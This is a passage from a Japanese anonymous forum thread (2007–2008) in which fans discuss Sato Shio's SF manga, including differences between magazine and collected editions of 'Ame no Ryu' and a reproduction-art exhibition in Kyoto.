数の力になりはしまいか。ならんか。

516 :花と名無しさん:2007/09/29(土) 19:51:52 ID:???0
ダ・ヴィンチ読んでたら「守り人」シリーズの上橋菜穂子さんがファンだと
インタビューで答えられてましたよ。「夢見る惑星」が一番好きらしい

517 :花と名無しさん:2007/09/30(日) 08:37:00 ID:???0
>>506-507
あーなるほど
わかったようなわからんような

ともあれ、サンクス


518 :花と名無しさん:2007/10/12(金) 23:46:25 ID:???0
今日、首都圏の自動改札機が稼動しなかったのは
ホストコンピュータのソフトが起動しなかったため、というニュースを聞いて、
マニアックがどうかしたのか?と思ってしまった。
マニアックは規模がもっと大きかったみたいだけどw

519 :花と名無しさん:2007/10/12(金) 23:51:50 ID:???0
例のホストコンピュータも、実はとっくにマニの手先かはりぼてに
なってるんじゃないのw

520 :花と名無しさん:2007/10/14(日) 02:27:36 ID:???0
そしたらマニの動作不安定ってことになっちゃうw

521 :花と名無しさん:2007/10/17(水) 22:32:28 ID:???0
マニの情緒不安定かもよ

522 :花と名無しさん:2007/10/17(水) 22:50:00 ID:???0
それならありそう。マニの思春期とかw

523 :花と名無しさん:2007/10/18(木) 20:04:58 ID:???0
マニが思春期か。
恋をする相手はいったい???

524 :花と名無しさん:2007/10/18(木) 21:17:54 ID:???0
同じく意を持ったコンピューターだったら大原まり子の世界だw

525 :花と名無しさん:2007/10/18(木) 21:24:01 ID:???0
鯉をするだけが思春期じゃないよきっと。

526 :花と名無しさん:2007/10/18(木) 22:43:34 ID:???0
マニの更年期… マニの自律神経失調症…
(ぶるぶる)

527 :花と名無しさん:2007/10/19(金) 07:23:48 ID:???0
思春期といえば、「私は何のために生まれてきたのか」「生まれてきたことに意味はあるのか」で
悩むのがデフォw

528 :花と名無しさん:2007/10/19(金) 21:02:16 ID:???0
「何のために生まれてきたのか」「生まれてきたことに・・・」は
もうやってしまったうえに、結論まで出して自爆したよな。

そうかもう思春期はやったあとか。マニの1日は人間の何年相当だったのか。

529 :花と名無しさん:2007/10/20(土) 01:45:31 ID:???0
マニの寿命はおそろしく長そうだ

530 :花と名無しさん:2007/10/25(木) 19:17:58 ID:???O
精霊王と天界の城が届いた記念!
マニの初恋はエミーだよ、ヒロインの宿命だ。

しかし、この人の作品はどれもサラっと怖いな……。

531 :花と名無しさん:2007/10/25(木) 22:11:18 ID:???0
>>419-422
漫画板の三宅乱丈スレに「イムリ」が
佐藤史生っぽいと何度も書き込まれてたので
読んでみたんだけど…
佐藤さんよりかなり泥臭い感じがしたなあ。
世界観の広がりも、佐藤作品のほうがあると思う。
そこそこ面白かったけどね。

532 :花と名無しさん:2007/10/25(木) 22:49:28 ID:???0
夢見るのタジオンて、今でいうツンデレ?


ミノルと類がお気に入りだったな。

533 :花と名無しさん:2007/10/26(金) 00:35:33 ID:PgypaB/m0
私はマニがお気に入り☆

534 :花と名無しさん:2007/10/26(金) 01:01:51 ID:???0
マニは初恋に至るほどには、まだ成長してなかった気がするなあ。
保護者(アキラ)に対する思慕の情の方が強かった気がする。
まだその段階でルシャナが合体しちゃって、情感の方は
あさっての方向に行っちゃったけど。

535 :花と名無しさん:2007/10/26(金) 01:13:25 ID:???0
>>531
三宅さんってウェットな感じ。
そこがドライな佐藤さんの作風と比べて泥臭く感じるんじゃないかな。
別枠で嫌いじゃないけど。打ち切りになったっぽい「ペット」とか。

536 :花と名無しさん:2007/10/26(金) 10:02:25 ID:???0
佐藤さんは人の営みや感情をいったん言葉を通して消化してから
描いている感じかな…三宅さんは生のまま。秘密の新撰組が好きだw

537 :花と名無しさん:2007/10/26(金) 12:06:58 ID:???0
佐藤さんはあえて「感情移入という手法を使わない」と言ってた記憶がある。どのキャラクターも客観的に描いているイメージがあるね。それでいて意外とストーリーは感情的なんだけど、作者が誰にも肩入れしていないので物語と世界に広がりがある
三宅さんは各のキャラクターの内面を巧みにえぐり出す感じ 視点はドライだけど演出がウェットかな テンション高いギャグも面白いし、狂気を描くと凄みがある

ただ、三宅さんは佐藤さんの漫画を好きだと思う、そんな感じはしますね
佐藤さんの新作がなかなか拝めない今、骨太な漫画を描ける後発の漫画家として楽しみにしているとこです
そろそろスレ違いですな



538 :花と名無しさん:2007/10/27(土) 12:58:17 ID:???0
『イリム』ってのは読んでみたいけど、漫画喫茶で見当たらないんだよな
(読んでみて気に入れば買う)



539 :花と名無しさん:2007/10/27(土) 13:37:52 ID:???0
佐藤さんのスレなのに語れる新作が無いのが寂しい…

540 :花と名無しさん:2007/10/27(土) 15:38:58 ID:???0
>>538
「 イ ム リ 」で探さないと、ないと思うよ〜

541 :花と名無しさん:2007/10/27(土) 16:44:19 ID:???0
「イムリ」って佐藤さんの作品があるんだとぐぐってしまった。
一度、三宅さんのも読んでみるかな。

542 :花と名無しさん:2007/10/27(土) 19:51:43 ID:???0
>>540
あーそうだったか
でも、「三宅」でも探したから大丈夫かな……かな……かな(自信なし)

>>539
淋しいけど、まあしょうがないでしょ

543 :花と名無しさん:2007/10/27(土) 21:24:15 ID:???0
んー、やっぱ「コピコピ」や「根玉子」よりは
「エメラルドオレンジ」とか「ミスルトのクッキー」のほうが
洗練されて見えるな……。
あと7日間周期で花が咲いて散るタトゥーって、すてき。

544 :花と名無しさん:2007/10/27(土) 21:57:32 ID:???0
唐突だけど、イリドムの医療ってほとんど機能してなかったのかな。
地球やその周辺とは遜色のない文明的な進歩の仕方をしていながら、
彼らが貴種と同じ組織を持っていないことに気づかなかったのは、
病気がほぼないから医療の進歩も必要なかった・・・ってこと?
貴種がいたんだからそうでもないよね。
リンの宇宙船で簡単にスキャンできるぐらいだから、
彼らも自分たちのことに早く気づけたと思うんだけど、どうなんだろう。

うまく説明できないのに長文でごめん。

545 :花と名無しさん:2007/10/28(日) 00:16:36 ID:???0
>>544
公式見解(?)として、種が別れるほど人工的に肉体を改造して
サイボーグ化も繰り返していた、ということだから、組成がどれだけ違っても
そこに疑問は持たなかったんじゃないかな。
重要なのは、起源が貴種にある、という一点だけだったみたいだし。
無意識下で、気付かないようにしてたとか。
起源が貴種にあると言い出したのが、最初に新人類を作ったイリドム貴種なのか
貴種が社会を運営できなくなった後の新人類なのかはわからないけど
新人類が社会を運営するようになった初期に、意図的に真実を隠蔽した可能性もあると思う。

546 :花と名無しさん:2007/10/28(日) 00:56:23 ID:???0
>>545
ありがとう。
そう言えば、「サッチネスを再発見」というのがあったけど、
以前にも社会的な混乱があったことを暗に言っているのかな。
貴種がとことん堕落して、そこから新人類たちの努力で社会を再構築
した・・・みたいな混乱期に、起源は貴種であることになったのかも知れないね。
なにより545さんの最初の3行、その通りのような気がした。

547 :花と名無しさん:2007/10/28(日) 12:09:26 ID:???0
バビロンまで何マイルの世界観と設定が凄く好きなんだけど、
なんで尼さんが逃げるのを諦めて出頭したのか分からなかった
ツェザーレが羽化しても、関係なく自分たちだけの女王が作れるんだよね?

548 :花と名無しさん:2007/10/29(月) 13:35:47 ID:???0
>>547 誤爆???

549 :花と名無しさん:2007/10/29(月) 15:11:33 ID:???0
>>548
誤爆?

550 :花と名無しさん:2007/10/29(月) 15:13:31 ID:???0
>548
私もそう思ったが、違うw
「心臓のない巨人」に収録されている「バビロンまで何マイル」の話だ。
川原泉さんの、「バビロンまで何マイル?」の話じゃない。
タイトルを読んで最初に思い浮かんだのが川原さんの方だったうえ、
あっちにはチェーザレ・ボルジアが出てくるから、よけいに混乱してしまったよ。

そういう意味の「誤爆???」じゃなかったら、ごめんなさい。

551 :花と名無しさん:2007/10/29(月) 18:35:38 ID:???0
佐藤さんの「バビロン」、雑誌初出時は違うタイトルだったよね?
後半の展開も少し変えてあったように思う。

552 :花と名無しさん:2007/10/29(月) 19:15:32 ID:???0
雑誌掲載時の細かい展開は覚えてないけど、タイトルは同じじゃないかなぁ
PFで読みながら、聞いたことあるタイトルだなーとか思ったような記憶あり

553 :花と名無しさん:2007/10/29(月) 20:07:09 ID:???0
>>550
私はマザーグースの話かとwwww



佐藤さんは雑誌に掲載された作品を単行本化する際に
描き直す事が多い気がする
雑誌の時よりもわかりやすくなってるね
バビロンのラストなんか雑誌では意味がよくわからなかったよ

554 :花と名無しさん:2007/10/29(月) 22:10:08 ID:???0
寡筆で遅筆の佐藤さんじゃなかったっけ?
鬼追うもの(と神やらい)もちょっと変更はいってたね。
でも私は雑誌版のほうが好きなときがある。
単に刷り込みかねえ。

555 :花と名無しさん:2007/10/30(火) 21:43:50 ID:???0
>>547
ヒトに遺伝子操作されて、
もう自分たちだけの女王はつくれないんじゃなかったっけ?
(本が手元にないので確認できんのだが)


556 :花と名無しさん:2007/10/30(火) 22:13:55 ID:???0
ツェザーレを羽化させないうちなら(?)新しい女王は作れるみたいよ
新しい星を手に入れて一度は新しい女王を選んだとしても、
そこをギュゲス達に嗅ぎ付けられたら同じことのくり返しだから諦めたのかな…
あの執念深さじゃツェザーレが駄目でも諦めそうもないし

557 :花と名無しさん:2007/10/31(水) 10:12:14 ID:???0
そんなところかな

腰を落ち着けて育てないと、マナ物質が足りなくなっちゃうしな
逃亡しながらじゃ、それは無理だろうし

558 :花と名無しさん:2007/11/14(水) 01:31:22 ID:???0
アタラクシアの尼さんたち、物語史上でも新種の生き物だと思った。
外伝とかありそう。佐藤さん描いてください。

559 :花と名無しさん:2007/11/14(水) 18:24:37 ID:???0
>物語史上でも新種の生き物

どういう意味?

560 :花と名無しさん:2007/11/15(木) 17:05:44 ID:???0
>>559
SFにはいろいろな宇宙生物がいて、その設定上の生態もさまざまだけど、
アタラクシアの尼さんたちはその(私が知る狭い範囲内だが)中では新しいな、と。
いろいろな作家さんのどの作品の生物も、それぞれが新しいんだけどねw
毎度のことながら、よく思いつくもんだと驚くよ。

561 :花と名無しさん:2007/11/15(木) 21:01:26 ID:???0
たしかに娼婦というモチーフも、蜂的な女王+姉妹的生物っていうのも、
それぞれある設定だけど、アタラクシアの尼さん生物とギュゲスたちって、
他に類似のものを想像できない設定かも。

562 :花と名無しさん:2007/11/17(土) 19:53:32 ID:???0
夢見る惑星をまた読んでしまった
読めば読むほど味が出るというか深い
30後半になってもまだこの漫画の人物描写や社会描写にうならされる
やっぱり佐藤史生は天才だな
という恥ずかしい感動に包まれたので描いてみた
絵もこの頃が一番充実している気がする

563 :花と名無しさん:2007/11/18(日) 16:26:54 ID:???0
>>562
ストーリーはとても面白かったけど、
欲を言えばもうちょっと、
普段の生活をこまごま描いてほしかったな。

馬祠祭のペキングで流行りのファッションとか
翠妖でお掃除ロボットにチップあげるとことか
宿り木の改造作物の傑作エメラルドオレンジとか
そういうのがSFの楽しみなんだよねー。

564 :花と名無しさん:2007/11/19(月) 02:37:14 ID:???0
夢見るは大傑作であるが故にああだったら、こうだったらと
思わずにはいられないね
3〜4巻辺りでページ数にもっと余裕があればと…
現状でも十二分に面白いけど
あのへんもう5、6巻くらいかけて描けてればなあ

565 :花と名無しさん:2007/11/19(月) 14:04:53 ID:???0
短さが逆にイリスたちの焦燥感をリアルに伝えてたとは思うけど
確かにあと1・2巻はあっても問題なく緊張感は保てただろうね

イリスとシリンや彼らの子孫が出てくる短編は嬉しかった
頑張って生き延びたんだなと思って
喪失感と爽快感がいっきにくるあのラストは本当にいい

566 :花と名無しさん:2007/11/19(月) 17:17:05 ID:???0
『夢見る惑星』といえば、自動的に「嘘も方便」という言葉が浮かんでくる

567 :花と名無しさん:2007/11/19(月) 22:58:30 ID:???0
イリスの焦燥感と言えば、
学生が「あの人だんだん品がなくなってきてる」だっけ、
そう言うシーンを思い出す。

568 :花と名無しさん:2007/11/19(月) 23:29:50 ID:???0
>>565
短編って画集に収録されてる奴かな…
それだけ読めてないんだよなorz

569 :花と名無しさん:2007/11/19(月) 23:34:52 ID:???0
文庫化するときにいれてくれればよかったのになぁ、後日談短編も。
打天楽は文庫に入ったのに・・・

570 :花と名無しさん:2007/11/19(月) 23:57:28 ID:???0
>>568
画集に収録されてる奴なら
アリスブック2にも掲載されてるよ
あとは初出のGFだけどまあアリスブックが一番入手しやすいかと

571 :花と名無しさん:2007/11/20(火) 16:39:05 ID:???0
レスありがとう
ググって見たんだけどタイトルは「竜の姫君」「雨の竜」であってるかな?
うあー読みたい…

572 :花と名無しさん:2007/11/20(火) 22:54:20 ID:???0
あってるよ。
ヤフオクに一定量は流通しているから、まあ値段との折り合いをみながら、
気長に待てば読める日はくるさ。

573 :花と名無しさん:2007/11/21(水) 05:05:47 ID:???0
雨の竜は、画集とアリスブックでセリフ修正があった

574 :花と名無しさん:2007/11/21(水) 10:40:53 ID:???0
kwsk

575 :花と名無しさん:2007/11/21(水) 12:18:20 ID:???0
>>573
なぜそこで止める? CMが入るのかよ!?

すいません、教えてください、どこですか?


576 :花と名無しさん:2007/11/21(水) 20:56:26 ID:???0
>>573
GFと画集でも台詞変更あったよ

577 :花と名無しさん:2007/11/21(水) 23:11:08 ID:???0
LV0 佐藤史生?どうせ典型的少女漫画だろ?どうでもいいよ…
LV1 目はあんまりお星様キラキラっぽくないな。ってかこの主人公何で本物の能力者暗殺してんの?
LV2 夢見る惑星のエンディングは綺麗だな。ゲイルさんってのはなんかキリっとしてて結構いいかも。
LV3 シリンさんって女神じゃね?理想の姉御さんって感じ・・・
LV4 マニアックも第五世代でかわいいな。馬鳴とか都祈雄とかまゆらとかエミーもいい・・・
LV5 七生子って無愛想で別にかわいくないのにヒロイン扱いされててうぜぇ。七生子死ね!
LV6 七生子結婚してくれ!
LV7 やべぇ七生子最高!七生子とマナ物質さえあれば生きていける!
LV8 七生子とキスした!俺は七生子とキスしたぞ!!
LV9 やっぱシリンさんの踊りは最高だわ
MAX 画集再発して欲しいよぉ〜

ガイドラインに貼っても理解されなさそうなので(失礼)こっちに…

578 :花と名無しさん:2007/11/21(水) 23:57:50 ID:???0
笑えるw

579 :花と名無しさん:2007/11/22(木) 00:09:27 ID:???0
七生子のくだりが笑えるw
つか、その位置に入るのかw

580 :花と名無しさん:2007/11/22(木) 00:17:45 ID:???0
LV5とLV6の間に何がw

581 :537:2007/11/22(木) 01:06:02 ID:???0
はっきり覚えているのは、
竜が呼びかける王女の名前が
アスカ > アスキィアン(フルネーム表示・一部だけど)
差別/放送禁止用語自粛もあったけど本が実家で…
たぶん、アリスブックIIの姫君の方とからめてネーム変えたのかと。


582 :537:2007/11/22(木) 01:11:17 ID:???0
あ、姫君がIで雨がIIでした。失礼。

583 :花と名無しさん:2007/11/22(木) 02:32:24 ID:???0
気になったのでざっと調べてみた。わかりにくい書き方ですが…。

画集 P14 3コマめ 寝ころんでないで 草(パダ)の根でも ほりに行けというんだ
アリスP214 3コマめ (寝ころんで・・はなし) 草(パダ)の根でも掘りに 行けというんだ
画集 P16 1コマめ 盲目のネアン殿は 盲(めしい)の白子で、その上足萎えという
アリスP216 1コマめ ネアン殿は 盲目で 歩くこともかなわぬ
画集 P37 3コマめ (台詞なし)
アリスP237 3コマめ 聞こえてない……?
画集 P37 4コマめ 雨の竜! わたしはアスカ これはタルクだ
アリスP237 4コマめ 雨の竜! わたしはアスキィアン これはタルクだ
画集 P38 3コマめ さんねん… フウノム・ゼム・ミウ? そらに かたよりない それはおかしい
アリスP238 3コマめ さんねん… そらに かたよりない それはおかしい
画集 P40 3コマめ では いこう アスカ
アリスP240 3コマめ では いこう アスキィアン
画集 P45 1コマめ ネアン殿の 神秘の力は たしかに敬称に あたいするものだ (注釈なし)
アリスP245 1コマめ ネアン殿の 神秘の力は たしかに敬称(※)に あたいするものだ
       (枠外に ※エル=かつて幻視者に用いられた敬称 と注釈あり)
画集 P45 2コマめ おのれ自身を みるものすべての 望ましい姿に やつし
アリスP245 2コマめ おのれ自身を みるものすべての 望ましい姿に 装い
画集 P46 1コマめ アスカ
アリスP246 1コマめ アスキィアン
画集 P47 4コマめ 十日目南方王国の 国境あたりで雨がやみ
アリスP246 4コマめ 十日目 国境あたりで雨がやみ

GFは持ってないので調べようがないw

584 :花と名無しさん:2007/11/22(木) 09:16:00 ID:???0
白子や「やつし」の改変は理由がわかるが、
「フウノム・ゼム・ミウ?」が削除されたのは何でだろう
(まあ、もともと意味不明のつぶやきだなぁ、と自分には謎の言葉だったけど)

585 :花と名無しさん:2007/11/22(木) 10:48:20 ID:???0
アリスしか読んでないと王子がアルビノってわかんないな

586 :花と名無しさん:2007/11/22(木) 23:03:53 ID:???0
>>584
フウノミ、意味不明ながら、子供の頭で、1、2、3? だと思ってた。
さんねん、を変換というか、認識しなおしてる感じかなって。

587 :花と名無しさん:2007/11/22(木) 23:33:26 ID:???0
子供の時に佐藤作品読んでたのか
自分だったら意味分からんかも

588 :花と名無しさん:2007/11/24(土) 03:05:12 ID:???0
>>583
GFが手元にないので
というか当時的にもGFと画集と見比べたわけではなく
画集見たとき変ってるなと思っただけなのでかなり記憶モードだけど
アリス2のp240の下の段のモノローグが
「王族は竜の言葉を解す…か」と「もはや人とも呼べぬ『雨の竜』」
だったような…記憶違いだったらスマン

589 :花と名無しさん:2007/11/25(日) 01:04:26 ID:???0
>>588
画集・アリスともに長年手元にありながら、
今回比較するまで一切の違いに気づいていなかった者にとっては
普通に読んでて変わってるなとわかるだけでも羨ましい記憶力です・・・

フウノムが消されたり、エルに注釈がついてたり、「南方王国の」がなくなってたり
なんとなくアリスの方は万人向けにしている感じだね。
本編を読んでいない人にもわかりやすく、というか。

590 :花と名無しさん:2007/11/30(金) 09:30:42 ID:???0
GF15号が手元にあるから調べてみたけど、カラーも含めて画集と同じだったよ

細かく言えば

・扉に「カラーSF巨編。36ページ読み切り」「佐藤史生」の表記あり
・最後の「END」のフォントが違う

けどw

あ〜、あとカバーの見返しのところに阿呆船のカラー絵が載ってる
「切りとってしおりにしましょう。」
だってww

591 :花と名無しさん:2007/11/30(金) 09:44:42 ID:???0
あ、書き忘れ。

違いを調べたのは>>583で指摘があった箇所だけ。

592 :花と名無しさん:2007/12/01(土) 04:54:04 ID:AYKbatU/0
ttp://www.kyotomm.com/2007/10/the_original_picture_2007.php

こないだ話題に上ったのとは違うイベントなのかな
いわゆる複製原画展というべきもののようだけど

でも京都まではちょっと行けないなあ

593 :花と名無しさん:2007/12/01(土) 19:23:10 ID:???0
京都・・
行けない距離じゃないけど
佐藤さん以外に興味持てる作家がいない

594 :花と名無しさん:2007/12/01(土) 19:34:01 ID:???0
嫌いというわけじゃないけど渋すぎだね…

595 :花と名無しさん:2007/12/01(土) 20:12:20 ID:???0
いまは現役じゃない面々っぽい

596 :花と名無しさん:2007/12/01(土) 20:13:26 ID:???0
あすなひろしさんのは、ぜひ見てみたい
でも、京都はちと遠いなぁ

597 :花と名無しさん:2007/12/01(土) 20:14:36 ID:???0
なんか佐藤さんだけ世代ずれてないか? 他の人目当ての人は佐藤さんが分からなそうだ
でも近ければ見たかったなあ…残念

598 :花と名無しさん:2007/12/01(土) 21:27:20 ID:???0
トークショウに出てくれるんなら万難を排してでも行くやつ
いるんだろうけどな
俺は海を渡らなならんし無理だが

599 :花と名無しさん:2007/12/01(土) 21:34:52 ID:???0
というか、確かに佐藤さんだけ浮いてるメンツだな。
ギリギリ竹宮さんとは同世代と言ってもいい…のかな。
でも展示会の趣旨を考えると、なんで佐藤さんが入ってるんだろうって感じだね。

600 :花と名無しさん:2007/12/01(土) 22:30:45 ID:???O
おやめづらしく複合船が浮上してましたね

601 :花と名無しさん:2007/12/02(日) 11:15:26 ID:???0
竹宮さんとは普通に同世代と思ってた
数年差じゃなかったっけ?

602 :花と名無しさん:2007/12/02(日) 11:22:04 ID:???0
というより、
竹宮・佐藤の両氏が浮いてる感じじゃないか?

603 :花と名無しさん:2007/12/02(日) 11:53:43 ID:???0
リアル年齢はともかく、件の案内にも書いてあるけど
佐藤さんは24年組の評価も固まった後に出てきた作家という印象がある。
あと、高橋真琴さんを筆頭にした、いわゆる「古き良き少女漫画」の中に
竹宮さんはギリギリ入れてもいいかなと思えるけど、佐藤さんは無理ぽ。

604 :花と名無しさん:2007/12/02(日) 12:01:16 ID:???0
あのメンツ並べたら佐藤史生はもちろんだが、
竹宮恵子もかなり浮いて見えるけどな。

605 :花と名無しさん:2007/12/02(日) 14:19:07 ID:???0
竹宮はアレだろ
地元で「大学教授」とかやってるし
なんか企画とか、発案とかにかんでるんじゃね?
佐藤さんが何で入ってるのかは確かに謎だが…

>>598
行く

606 :花と名無しさん:2007/12/02(日) 15:49:02 ID:???0
>>605
会場のマンガミュージアムってのが
京都市と京都精華大学の共同経営みたいだからそうだろうねきっと。


607 :花と名無しさん:2007/12/02(日) 17:30:31 ID:???0
じゃあ竹宮さんが佐藤さんを引っ張ってきたとか……は、ないかなぁ?

608 :花と名無しさん:2007/12/02(日) 19:03:24 ID:???0
>>605
佐藤は「さん」付けで、竹宮は呼び捨てか……

609 :花と名無しさん:2007/12/02(日) 19:35:39 ID:???0
>>608
細かいこと気にしなさんな。

佐藤さんじゃなくて山田ミネコとかだったら
ちょっとは浮かずにすんだかな…。

610 :花と名無しさん:2007/12/02(日) 19:49:06 ID:???0
水野さん(ほかひとり失念)とは4〜5年前に新宿紀伊国屋で原画展をいっしょにやった縁があるかな。
そのとき物販コーナーにいた黒ドレスの水野御大には驚いたものだ。

611 :610:2007/12/02(日) 19:57:23 ID:???0
と思ったら、そのときも<原画´(ダッシュ)展>と銘打っていたような。

612 :花と名無しさん:2007/12/03(月) 10:05:24 ID:???0
>>609
普通に気になるけどなぁ。

>>610
そんなイベントがあったのか。
東京なら行けたのに。
惜しいことをした。

っつーか、物販コーナーに水野氏自身がいたのか!?(驚)

613 :花と名無しさん:2007/12/04(火) 00:05:16 ID:???0
原画ダッシュ展行ってきたよ。
って、職場がすぐそばなので行きやすかった。
普通の美術館と違って夜7:30までに入場すればいいので会社帰りにもいける。

たしかに、そのほかの人と、竹宮さん&佐藤さんは年代というか絵柄にギャップがあった。
古めのデビュー当時の絵とかが混じっていたらまだ違和感ないんだろうけど、
ふたりとも一番量産していた時代が、他の作家さんより新しいからね。

佐藤さんのは
夢見る惑星、ワン・ゼロ、チェンジリング、打天楽、精霊王、鬼追うもの
からモノクロ、カラー取り混ぜて20点。
カラーは 夢見る惑星FC1巻表紙、精霊王表紙、鬼追うもの表紙なんかがあった。
展示コーナーの中央には比較的手に入りやすいと思われる各作家さんの単行本があり
そこに展示中の絵が載っている佐藤さんのコミックスもおいてあった。

原画ダッシュ、夜だしそんなに明るくない&目が悪いからかもしれないけど」
原画じゃないのがわからないぐらい精巧にできてた。
鉛筆がきの台詞&黒ベタの墨の塗りムラ、原稿用紙の黄ばみ、
ホワイトの盛り上がりっぽい雰囲気までホンモノそっくりに感じた。



614 :花と名無しさん:2007/12/04(火) 22:00:45 ID:???0
お〜、会場のご近所なのか、いいな

佐藤さんはもちろんだが、
あすなひろしさんの原画ダッシュを見てみたいなぁ


615 :花と名無しさん:2007/12/16(日) 14:09:24 ID:???0
諸星大二郎さんの「孔子暗黒伝」と
佐藤さんの「ワンゼロ」を読み比べると、いろいろ面白いな

ここにいる佐藤ファンで、諸星作品を読んでる人います?


616 :花と名無しさん:2007/12/16(日) 16:40:20 ID:???0
ノシ
最初読んだとき影の付け方がモロ☆みたいだと思った

617 :花と名無しさん:2007/12/16(日) 19:45:13 ID:???0
読んでない人の方が少ないかもしらん

618 :花と名無しさん:2007/12/16(日) 21:12:17 ID:???0
>>615
ぴったりなのは開明獣(?字合ってる?)だよね
モロ☆のは展開がどうなるかわからないドキドキ物だけど
佐藤塩は安心して楽しめる感じだ

619 :花と名無しさん:2007/12/17(月) 01:43:28 ID:???0
打天楽に開明獣出てなかったっけ。その話?

#開明獣を何度見ても開明墨汁が浮かぶのは内緒だ。

620 :花と名無しさん:2007/12/17(月) 08:57:34 ID:???0
自分も両方読んでいる。
同じ世界観によるものなのか
リスペクトされたのか
まあ、お二方とも文化人類学的造詣が
深いので偶然だろうな〜
しらんけど・・・

621 :花と名無しさん:2007/12/17(月) 21:55:09 ID:???0
元ネタというか、元の世界観がリグ・ヴェータらしいから(どちらも作品中に出てくる)、
似ていてもおかしくないし、
佐藤さんが諸星さんの作品にインスパイアされたとも十分考えられる。

ダーサとディーバの対立は諸さんでは単純に光と影と表現してるけど、
これはマユリとトキ、赤とアスラだよね。
どちらも、融合してるし。

ただ、諸さんのほうはコンピュータがちょっと絡んでる程度だけど、
佐藤さんはこれを最前線に押し出してきた
しかも、内容が時代を先取り。すごいなーと思ったサ(二人ともすごいけどね、もちろん)。

打天楽では、開明獣はもちろん麒麟も出てくるね




622 :花と名無しさん:2007/12/17(月) 22:29:02 ID:???0
なるほど面白いね
モロ☆の方はもう世界がでっかすぎてブッタとか4本の円盤の柱のとか
( ゚д゚)ポカーン通り越して( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \

コンピュータに関しては
2001年のやつとワンゼロ以上に面白いのは思いつかないよ

623 :花と名無しさん:2007/12/17(月) 23:09:00 ID:???0
諸星さんのときはコンピューターは
まだ紙テープだったものネ!

でも、易の交辞棒(漢字あってるかな)と
コンピュータの二進数の概念は同じってとこに
凄みを感じたものだけど

あと「うなり木」だっけ?も両方にでてなかったかな
紐の先に木を結んで「うぉぉぁおぁん」てやつ

今手元にないもんでうろおぼえ・・・

624 :花と名無しさん:2007/12/18(火) 00:49:31 ID:???0
発表年はたった7〜8年の差なんだけど、
諸さんの作品のコンピュータとはえらい差ですな!

IT関連の進歩は本当にすさまじい。
その中でも、佐藤さんが作品に取り入れた素早さとその内容、想像力。
さらに、独特の作風はもう特筆に値しますね。

625 :花と名無しさん:2007/12/18(火) 01:03:18 ID:???0
うん、もっと評価されてもいい。とくにネットでは。
なーんて勝手なこと考えるw

626 :花と名無しさん:2007/12/18(火) 19:19:47 ID:???0
海外で映画化されるとかあったらいいのに。
いまの日本より欧米の方が受けそうな気も?

627 :花と名無しさん:2007/12/18(火) 19:44:52 ID:???0
海外か…イギリスあたりなら上手くやってくれるかも知れないけど、
アメリカはえらいことになりそうw

628 :花と名無しさん:2007/12/18(火) 20:01:52 ID:???0
でも、携帯電話の発展には思い至らんかったみたいね
仕方ないか・・・
でも1999年あたりはどんなだったっけ?
オイラも、すでに忘れている

629 :花と名無しさん:2007/12/18(火) 20:08:36 ID:???0
携帯が若者の間に普及しはじめた頃かな。
PHSもまだ元気だった。インターネットも広がり始めたころ。まだまだナローバンドだった。

630 :花と名無しさん:2007/12/19(水) 13:14:08 ID:???0
漫画のほうも、ケータイはそれならまあ何とかってとこかな
その代わりタクシートークンというのがあったね
今のSUICAやPASMOみたいなもんかな?

実際に「ワン・ゼロ」が制作されてたのは80年代前半くらいだったっけ?

631 :花と名無しさん:2007/12/19(水) 17:13:00 ID:???0
記録媒体が「ディスク」になってるのを見抜いたのは慧眼かな
CD・LDなんかはあったけど…

632 :花と名無しさん:2007/12/19(水) 19:03:52 ID:???0
>>630
1984年から86年だったみたいですね。

自動車電話は79年から一部の特権階級の人たちが使用していたのかな。
普及し始めたのは90年代半ばから後半?
それまでは忙しい人のための高価なアイテム・・・といった印象でしたよね。
レーザーディスクも見なくなりましたね。

633 :花と名無しさん:2007/12/19(水) 19:22:55 ID:???0
打天楽では「携帯コミュニケーター」ってセリフがあった

634 :花と名無しさん:2007/12/26(水) 13:58:05 ID:???0
NTT電話ボックスは夢?の中だったっけ。

635 :花と名無しさん:2007/12/26(水) 19:12:59 ID:???0
公衆電話は、
『ワン・ゼロ』でルシャナを掘りに行くときエミーが使ってて、
『打天楽』では、ミノルが「夢」の中でNTTボックスに入ってますね

636 :花と名無しさん:2007/12/26(水) 19:30:08 ID:???0
ワン・ゼロでは、トキが確かヒカルにだったかな?電話してたのが、
TV電話なのにw公衆電話BOXだった。
たしかあの頃は、携帯電話どころか、コードレスフォンもまだ出てきてないと思う。
打楽天でも、夢の中に出てきたのは電話BOXで、あの時点では誰も
「携帯電話」なんていうものは誰も思いつかなかったってことだよね。
アキラは「電話BOXって所がスクエアなんだよ、せめて携帯コミニュケーター」と
ぶつぶつ言ってたけど「携帯電話」という単語は、まだまったく普及してなかったんだと思う。
夢にBOXを出現させたのが誰かはわからないけど、
テレフォントークン(テレフォンカードみたいなものか?)をお守りにしてたエミーかな。

637 :花と名無しさん:2007/12/26(水) 21:14:15 ID:???0
携帯電話って普通に使ってるがそのまんまだなw

ルシャナを起こす音源がカセットテープだったのが懐かしい。

638 :花と名無しさん:2007/12/26(水) 22:20:21 ID:???0
>>636
当時はせいぜい自動車電話あたりじゃないかな。
本体がランドセルぐらいの大きさw
電話がここまで小さくなって携帯できるなんて考えもつかない感じ。

まあ、大昔の初代の市販されたワープロは事務机と同じぐらいの大きさだったし。

639 :花と名無しさん:2007/12/27(木) 12:57:42 ID:???0
ワンゼロから遡ること3,4年
友達の兄がめずらしくPCを持っていてスゴイ自慢ゲ
『インベーダーゲームやりたい?』って聞くから
ウンと言わされて、そしたら
『ちょっと待ってね』と言われて2,30分待たされたかな。
カセットテープからスゲー時間かかって読み込んでたよ。
ガン×ムファーストのちょっと後くらい。
そういやトキオが宇宙怪獣ギンダムとかみてたな。ガンダムのパクかな

640 :花と名無しさん:2007/12/27(木) 18:55:43 ID:???0
>トキオが宇宙怪獣ギンダムとかみてたな

見てた見てたw

641 :花と名無しさん:2007/12/30(日) 20:02:14 ID:???0
>宇宙怪獣ギンダム

まあアニメとかは見ない人なんだろうけど
一応マンガ・SF畑の人間なのに、あまりにあまりなネーミングセンスで
読んだ当時吹いたわ

642 :花と名無しさん:2008/01/04(金) 12:11:10 ID:???0
それって、普通に佐藤史生が意図した通りの反応じゃないかい?

643 :花と名無しさん:2008/01/04(金) 13:43:57 ID:???0
普通にギャグだと思ってたw

644 :花と名無しさん:2008/01/04(金) 23:51:44 ID:???0
ギャグかマジか  いずれにせよ寒いけどなw

645 :花と名無しさん:2008/01/05(土) 12:44:07 ID:???0
よくあるお遊びだろうな
別に寒いってほどのもんでもない

